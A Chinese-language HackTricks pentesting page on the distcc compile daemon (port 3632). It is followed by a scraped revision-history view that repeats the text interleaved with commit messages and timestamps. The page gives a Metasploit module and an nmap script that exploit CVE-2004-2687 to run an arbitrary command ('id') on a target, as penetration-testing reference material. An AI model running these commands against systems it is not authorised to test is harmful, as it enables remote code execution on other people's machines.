hacktricks/network-services-pentesting/3632-pentesting-distcc.md

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>


# 基本信息

**Distcc**是一种工具，通过利用网络中其他计算机的**空闲处理能力**来增强**编译过程**。当在一台机器上设置**distcc**时，该机器能够将其**编译任务**分发给另一台系统。接收系统必须运行**distccd守护程序**，并且必须安装有**兼容的编译器**以处理发送的代码。

**默认端口：** 3632
```
PORT     STATE SERVICE
3632/tcp open  distccd
```
# 漏洞利用

检查是否容易受到 **CVE-2004-2687** 漏洞的影响，以执行任意代码：
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan

_我认为shodan没有检测到这项服务。_

# 资源

* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)

由 **Álex B (@r1p)** 创建的帖子
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes

											
										
										
											2024-02-09 12:48:25 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

											
										
										
											2024-03-11 14:44:45 +00:00
+								其他支持HackTricks的方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

											
										
										
											2024-03-11 14:44:45 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
-												Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes

											
										
										
											2024-02-09 12:48:25 +00:00
+								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
 								* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-												Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

											
										
										
											2024-03-11 14:44:45 +00:00
+								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								# 基本信息
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

											
										
										
											2024-03-11 14:44:45 +00:00
+								**Distcc**是一种工具，通过利用网络中其他计算机的**空闲处理能力**来增强**编译过程**。当在一台机器上设置**distcc**时，该机器能够将其**编译任务**分发给另一台系统。接收系统必须运行**distccd守护程序**，并且必须安装有**兼容的编译器**以处理发送的代码。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								**默认端口：** 3632
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								PORT     STATE SERVICE
 /tcp open  distccd
 								```
-												Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes

											
										
										
											2024-02-09 12:48:25 +00:00
+								# 漏洞利用
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes

											
										
										
											2024-02-09 12:48:25 +00:00
+								检查是否容易受到 **CVE-2004-2687** 漏洞的影响，以执行任意代码：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								msf5 > use exploit/unix/misc/distcc_exec
-												Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

											
										
										
											2024-03-11 14:44:45 +00:00
+								nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												fix mess 2

											
										
										
											2022-05-01 12:49:36 +00:00
+								# Shodan
-												GitBook: [master] one page modified
											
										
										
											2020-10-05 10:16:52 +00:00
-												Translated ['network-services-pentesting/10000-network-data-management-p

											
										
										
											2024-01-05 23:03:10 +00:00
+								_我认为shodan没有检测到这项服务。_
-												GitBook: [master] one page modified
											
										
										
											2020-10-05 10:16:52 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								# 资源
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#2876] save

											
										
										
											2021-11-30 16:46:07 +00:00
+								* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
-												Translated ['mobile-pentesting/ios-pentesting/README.md', 'mobile-pentes

											
										
										
											2024-02-09 12:48:25 +00:00
+								由 **Álex B (@r1p)** 创建的帖子